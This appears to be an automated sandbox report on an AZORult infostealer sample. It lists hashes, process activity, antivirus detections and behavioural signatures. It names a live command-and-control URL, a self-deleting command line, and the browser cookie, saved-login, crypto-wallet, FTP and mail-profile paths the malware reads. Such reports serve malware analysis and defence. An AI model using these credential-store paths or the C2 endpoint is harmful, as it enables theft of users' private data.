paladin316

Exes_a47488466980088aa1a6cb1ec3416907_exe_2019-08-16_10_30.txt

Aug 16th, 2019
  1.  
  2. * MalFamily: "AZORult"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_a47488466980088aa1a6cb1ec3416907.exe"
  7. * File Size: 4376576
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "5e768d552266d596c13ebeeede114300a9ae38ced6c885f3fad8d646cb1333d7"
  10. * MD5: "a47488466980088aa1a6cb1ec3416907"
  11. * SHA1: "ac8e97f51c621b2bee291745fcaf8b9c29aa2b92"
  12. * SHA512: "4e326e729b9f9ca474bd93da24d9f97b8439a7e60c01f7768069d3300bf791f9a451779983de94f1068e62ed68ca5f351d6815240448bf9459d6f569308d64c8"
  13. * CRC32: "D798E1D5"
  14. * SSDEEP: "98304:FEnVOD3k9R6QjpCxPGHPVOLapih7pLJYWWXPtf1W:1k9AK1tOO69LK1fY"
  15.  
  16. * Process Execution:
  17. "Exes_a47488466980088aa1a6cb1ec3416907.exe",
  18. "BHkd3kxjBDe.exe",
  19. "4koTr0CX1Je1Yp8mra3YBZ.exe",
  20. "4koTr0CX1Je1Yp8mra3YBZ.tmp",
  21. "Exes_a47488466980088aa1a6cb1ec3416907.exe",
  22. "cmd.exe",
  23. "timeout.exe",
  24. "services.exe",
  25. "lsass.exe",
  26. "taskhost.exe",
  27. "sc.exe",
  28. "svchost.exe",
  29. "svchost.exe",
  30. "WerFault.exe",
  31. "wermgr.exe"
  32.  
  33.  
  34. * Executed Commands:
  35. "C:\\Users\\user\\AppData\\Local\\Temp\\BHkd3kxjBDe.exe ",
  36. "C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe ",
  37. "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_a47488466980088aa1a6cb1ec3416907.exe\"",
  38. "\"C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp\" /SL5=\"$12018E,3267609,58368,C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe\" /verysilent",
  39. "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"Exes_a47488466980088aa1a6cb1ec3416907.exe\"",
  40. "C:\\Windows\\system32\\lsass.exe",
  41. "taskhost.exe $(Arg0)",
  42. "C:\\Windows\\system32\\sc.exe start w32time task_started",
  43. "C:\\Windows\\system32\\svchost.exe -k LocalService",
  44. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  45. "C:\\Windows\\system32\\timeout.exe 3",
  46. "C:\\Windows\\system32\\WerFault.exe -u -p 2800 -s 288",
  47. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_0b556381\""
  48.  
  49.  
  50. * Signatures Detected:
  51.  
  52. "Description": "At least one process apparently crashed during execution",
  53. "Details":
  54.  
  55.  
  56. "Description": "Creates RWX memory",
  57. "Details":
  58.  
  59.  
  60. "Description": "Reads data out of its own binary image",
  61. "Details":
  62.  
  63. "self_read": "process: 4koTr0CX1Je1Yp8mra3YBZ.exe, pid: 2480, offset: 0x0031dc19, length: 0x0000a4cf"
  64.  
  65.  
  66. "self_read": "process: 4koTr0CX1Je1Yp8mra3YBZ.exe, pid: 2480, offset: 0x003282a4, length: 0x0003b205"
  67.  
  68.  
  69. "self_read": "process: 4koTr0CX1Je1Yp8mra3YBZ.tmp, pid: 2648, offset: 0x00000000, length: 0x000afa00"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "A process created a hidden window",
  75. "Details":
  76.  
  77. "Process": "Exes_a47488466980088aa1a6cb1ec3416907.exe -> C:\\Windows\\System32\\cmd.exe"
  78.  
  79.  
  80.  
  81.  
  82. "Description": "Drops a binary and executes it",
  83. "Details":
  84.  
  85. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe"
  86.  
  87.  
  88. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\BHkd3kxjBDe.exe"
  89.  
  90.  
  91. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp"
  92.  
  93.  
  94.  
  95.  
  96. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  97. "Details":
  98.  
  99. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  100.  
  101.  
  102. "suspicious_request": "http://zdproject.best/index.php"
  103.  
  104.  
  105.  
  106.  
  107. "Description": "Performs some HTTP requests",
  108. "Details":
  109.  
  110. "url": "http://zdproject.best/index.php"
  111.  
  112.  
  113.  
  114.  
  115. "Description": "The binary likely contains encrypted or compressed data.",
  116. "Details":
  117.  
  118. "section": "name: .rsrc, entropy: 7.99, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ, raw_size: 0x00387a00, virtual_size: 0x00387950"
  119.  
  120.  
  121.  
  122.  
  123. "Description": "Executed a process and injected code into it, probably while unpacking",
  124. "Details":
  125.  
  126. "Injection": "Exes_a47488466980088aa1a6cb1ec3416907.exe(2736) -> Exes_a47488466980088aa1a6cb1ec3416907.exe(2060)"
  127.  
  128.  
  129.  
  130.  
  131. "Description": "Deletes its original binary from disk",
  132. "Details":
  133.  
  134.  
  135. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  136. "Details":
  137.  
  138. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11464360 times"
  139.  
  140.  
  141.  
  142.  
  143. "Description": "Steals private information from local Internet browsers",
  144. "Details":
  145.  
  146. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
  147.  
  148.  
  149. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
  150.  
  151.  
  152. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
  153.  
  154.  
  155. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
  156.  
  157.  
  158. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
  159.  
  160.  
  161. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
  162.  
  163.  
  164. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
  165.  
  166.  
  167. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
  168.  
  169.  
  170. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
  171.  
  172.  
  173. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
  174.  
  175.  
  176. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  177.  
  178.  
  179. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
  180.  
  181.  
  182. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
  183.  
  184.  
  185. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  186.  
  187.  
  188. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
  189.  
  190.  
  191. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  192.  
  193.  
  194. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
  195.  
  196.  
  197. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
  198.  
  199.  
  200. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  201.  
  202.  
  203. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
  204.  
  205.  
  206.  
  207.  
  208. "Description": "Collects information about installed applications",
  209. "Details":
  210.  
  211. "Program": "Google Update Helper"
  212.  
  213.  
  214.  
  215.  
  216. "Program": "Microsoft Excel MUI 2013"
  217.  
  218.  
  219. "Program": "Microsoft Outlook MUI 2013"
  220.  
  221.  
  222.  
  223.  
  224. "Program": "Google Chrome"
  225.  
  226.  
  227. "Program": "Adobe Flash Player 29 NPAPI"
  228.  
  229.  
  230. "Program": "Adobe Flash Player 29 ActiveX"
  231.  
  232.  
  233. "Program": "Microsoft Word MUI 2013"
  234.  
  235.  
  236. "Program": "Microsoft Access MUI 2013"
  237.  
  238.  
  239. "Program": "Microsoft Office Proofing Tools 2013 - English"
  240.  
  241.  
  242. "Program": "Adobe Acrobat Reader DC"
  243.  
  244.  
  245. "Program": "Microsoft Publisher MUI 2013"
  246.  
  247.  
  248. "Program": "Microsoft Office Shared MUI 2013"
  249.  
  250.  
  251. "Program": "Microsoft Office OSM MUI 2013"
  252.  
  253.  
  254. "Program": "Microsoft InfoPath MUI 2013"
  255.  
  256.  
  257. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  258.  
  259.  
  260. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  261.  
  262.  
  263. "Program": "Throttle"
  264.  
  265.  
  266. "Program": "Microsoft DCF MUI 2013"
  267.  
  268.  
  269. "Program": "Microsoft OneDrive"
  270.  
  271.  
  272. "Program": "Microsoft Groove MUI 2013"
  273.  
  274.  
  275. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  276.  
  277.  
  278.  
  279.  
  280. "Program": "Microsoft Access Setup Metadata MUI 2013"
  281.  
  282.  
  283. "Program": "Microsoft Office OSM UX MUI 2013"
  284.  
  285.  
  286. "Program": "Java Auto Updater"
  287.  
  288.  
  289. "Program": "Microsoft PowerPoint MUI 2013"
  290.  
  291.  
  292. "Program": "Microsoft Office Professional Plus 2013"
  293.  
  294.  
  295. "Program": "Adobe Refresh Manager"
  296.  
  297.  
  298. "Program": "Microsoft Office Proofing 2013"
  299.  
  300.  
  301. "Program": "Microsoft Lync MUI 2013"
  302.  
  303.  
  304.  
  305.  
  306. "Program": "Microsoft OneNote MUI 2013"
  307.  
  308.  
  309.  
  310.  
  311. "Description": "File has been identified by 25 Antiviruses on VirusTotal as malicious",
  312. "Details":
  313.  
  314. "FireEye": "Generic.mg.a47488466980088a"
  315.  
  316.  
  317. "McAfee": "Fareit-FPQ!A47488466980"
  318.  
  319.  
  320. "Cylance": "Unsafe"
  321.  
  322.  
  323. "Cybereason": "malicious.51c621"
  324.  
  325.  
  326. "TrendMicro": "TrojanSpy.Win32.LOKI.SMDD.hp"
  327.  
  328.  
  329. "Symantec": "ML.Attribute.HighConfidence"
  330.  
  331.  
  332. "APEX": "Malicious"
  333.  
  334.  
  335. "Avast": "Win32:Malware-gen"
  336.  
  337.  
  338. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  339.  
  340.  
  341. "Endgame": "malicious (high confidence)"
  342.  
  343.  
  344. "Sophos": "Mal/Fareit-V"
  345.  
  346.  
  347. "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.rc"
  348.  
  349.  
  350. "Trapmine": "malicious.high.ml.score"
  351.  
  352.  
  353. "Paloalto": "generic.ml"
  354.  
  355.  
  356. "Avira": "TR/AD.MoksSteal.dcot"
  357.  
  358.  
  359. "Microsoft": "Trojan:Win32/Conteban.B!ml"
  360.  
  361.  
  362. "AhnLab-V3": "Win-Trojan/Delphiless.Exp"
  363.  
  364.  
  365. "Acronis": "suspicious"
  366.  
  367.  
  368. "ESET-NOD32": "a variant of Win32/Injector.EHEN"
  369.  
  370.  
  371. "TrendMicro-HouseCall": "TrojanSpy.Win32.LOKI.SMDD.hp"
  372.  
  373.  
  374. "Rising": "Trojan.IPLogger!1.B69D (CLASSIC)"
  375.  
  376.  
  377. "Fortinet": "W32/Injector.EGXE!tr"
  378.  
  379.  
  380. "Webroot": "W32.Malware.Gen"
  381.  
  382.  
  383. "AVG": "Win32:Malware-gen"
  384.  
  385.  
  386. "CrowdStrike": "win/malicious_confidence_60% (D)"
  387.  
  388.  
  389.  
  390.  
  391. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  392. "Details":
  393.  
  394.  
  395. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  396. "Details":
  397.  
  398.  
  399. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  400. "Details":
  401.  
  402. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
  403.  
  404.  
  405. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
  406.  
  407.  
  408. "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
  409.  
  410.  
  411. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
  412.  
  413.  
  414. "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
  415.  
  416.  
  417. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
  418.  
  419.  
  420. "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
  421.  
  422.  
  423. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
  424.  
  425.  
  426. "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
  427.  
  428.  
  429. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
  430.  
  431.  
  432. "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
  433.  
  434.  
  435. "file": "C:\\Users\\user\\AppData\\wallet.dat"
  436.  
  437.  
  438. "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
  439.  
  440.  
  441. "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
  442.  
  443.  
  444. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
  445.  
  446.  
  447. "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
  448.  
  449.  
  450. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  451.  
  452.  
  453.  
  454.  
  455. "Description": "Harvests credentials from local FTP client software",
  456. "Details":
  457.  
  458. "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
  459.  
  460.  
  461.  
  462.  
  463. "Description": "Harvests information related to installed instant messenger clients",
  464. "Details":
  465.  
  466. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  467.  
  468.  
  469.  
  470.  
  471. "Description": "Harvests information related to installed mail clients",
  472. "Details":
  473.  
  474. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  475.  
  476.  
  477. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
  478.  
  479.  
  480. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  481.  
  482.  
  483. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  484.  
  485.  
  486. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  487.  
  488.  
  489. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  490.  
  491.  
  492. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  493.  
  494.  
  495. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
  496.  
  497.  
  498. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  499.  
  500.  
  501. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  502.  
  503.  
  504. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  505.  
  506.  
  507. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  508.  
  509.  
  510. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  511.  
  512.  
  513. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  514.  
  515.  
  516. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
  517.  
  518.  
  519. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  520.  
  521.  
  522. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  523.  
  524.  
  525. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
  526.  
  527.  
  528. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
  529.  
  530.  
  531. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
  532.  
  533.  
  534. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  535.  
  536.  
  537.  
  538.  
  539. "Description": "Collects information to fingerprint the system",
  540. "Details":
  541.  
  542.  
  543. "Description": "Anomalous binary characteristics",
  544. "Details":
  545.  
  546. "anomaly": "Timestamp on binary predates the release date of the OS version it requires by at least a year"
  547.  
  548.  
  549.  
  550.  
  551. "Description": "Created network traffic indicative of malicious activity",
  552. "Details":
  553.  
  554. "signature": "ET TROJAN Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative)"
  555.  
  556.  
  557.  
  558.  
  559.  
  560. * Started Service:
  561. "VaultSvc",
  562. "WerSvc",
  563. "W32Time"
  564.  
  565.  
  566. * Mutexes:
  567. "CicLoadWinStaWinSta0",
  568. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  569. "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726",
  570. "Local\\RstrMgr3887CAB8-533F-4C85-B0DC-3E5639F8D511",
  571. "Local\\RstrMgr-3887CAB8-533F-4C85-B0DC-3E5639F8D511-Session0000",
  572. "DefaultTabtip-MainUI",
  573. "Local\\WERReportingForProcess2800",
  574. "Global\\\\xe5\\x88\\x90\\xc2\\xa6",
  575. "Global\\\\xed\\x95\\xb0!",
  576. "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
  577.  
  578.  
  579. * Modified Files:
  580. "C:\\Users\\user\\AppData\\Local\\Temp\\BHkd3kxjBDe.exe",
  581. "C:\\Users\\user\\AppData\\Local\\Temp\\4koTr0CX1Je1Yp8mra3YBZ.exe",
  582. "C:\\Users\\user\\AppData\\Local\\Temp\\is-ST5KT.tmp\\4koTr0CX1Je1Yp8mra3YBZ.tmp",
  583. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
  584. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
  585. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
  586. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
  587. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
  588. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
  589. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
  590. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
  591. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
  592. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
  593. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
  594. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
  595. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
  596. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
  597. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
  598. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
  599. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
  600. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
  601. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  602. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
  603. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
  604. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
  605. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
  606. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
  607. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
  608. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
  609. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
  610. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
  611. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
  612. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
  613. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
  614. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
  615. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
  616. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
  617. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
  618. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
  619. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
  620. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
  621. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
  622. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
  623. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
  624. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
  625. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
  626. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
  627. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
  628. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
  629. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
  630. "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
  631. "C:\\Users\\user\\AppData\\Local\\Temp\\86867814736212939668321.tmp",
  632. "C:\\Users\\user\\AppData\\Local\\Temp\\87383125507293532077856.tmp",
  633. "C:\\Users\\user\\AppData\\Local\\Temp\\8738375678859424949995.tmp",
  634. "C:\\Users\\user\\AppData\\Local\\Temp\\87384063080549063902971.tmp",
  635. "C:\\Users\\user\\AppData\\Local\\Temp\\87384533265966878166663.tmp",
  636. "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
  637. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_setup64.tmp",
  638. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\_isetup\\_isdecmp.dll",
  639. "C:\\Program Files (x86)\\PGWARE\\Throttle\\Throttle.chm",
  640. "C:\\Program Files (x86)\\PGWARE\\Throttle\\Throttle.exe",
  641. "C:\\Program Files (x86)\\PGWARE\\Throttle\\ThrottleRegister.exe",
  642. "C:\\Program Files (x86)\\PGWARE\\Throttle\\ThrottleUpdate.exe",
  643. "C:\\Program Files (x86)\\PGWARE\\Throttle\\unins000.dat",
  644. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-8UKGJ.tmp",
  645. "C:\\Program Files (x86)\\PGWARE\\Throttle\\unins000.exe",
  646. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\is-FUI03.tmp",
  647. "C:\\Users\\user\\AppData\\Local\\Temp\\is-25UMB.tmp\\trees.bmp",
  648. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-D8VAV.tmp",
  649. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-EOBJF.tmp",
  650. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-080PA.tmp",
  651. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H79UP.tmp",
  652. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-H8S3C.tmp",
  653. "C:\\Program Files (x86)\\PGWARE\\Throttle\\ReadMe.rtf",
  654. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-ARK8K.tmp",
  655. "C:\\Program Files (x86)\\PGWARE\\Throttle\\License.rtf",
  656. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-P68A4.tmp",
  657. "C:\\Program Files (x86)\\PGWARE\\Throttle\\uninsimg.dat",
  658. "C:\\Program Files (x86)\\PGWARE\\Throttle\\is-VASLS.tmp",
  659. "C:\\Program Files (x86)\\PGWARE\\Throttle\\History.rtf",
  660. "\\??\\PIPE\\srvsvc",
  661. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Help.lnk",
  662. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Throttle Support.url",
  663. "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Throttle\\Update Throttle.lnk",
  664. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  665. "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
  666. "C:\\Windows\\sysnative\\LogFiles\\Scm\\0efb1c2e-8bcc-468c-aa07-37b1f761840f",
  667. "\\??\\PIPE\\lsarpc",
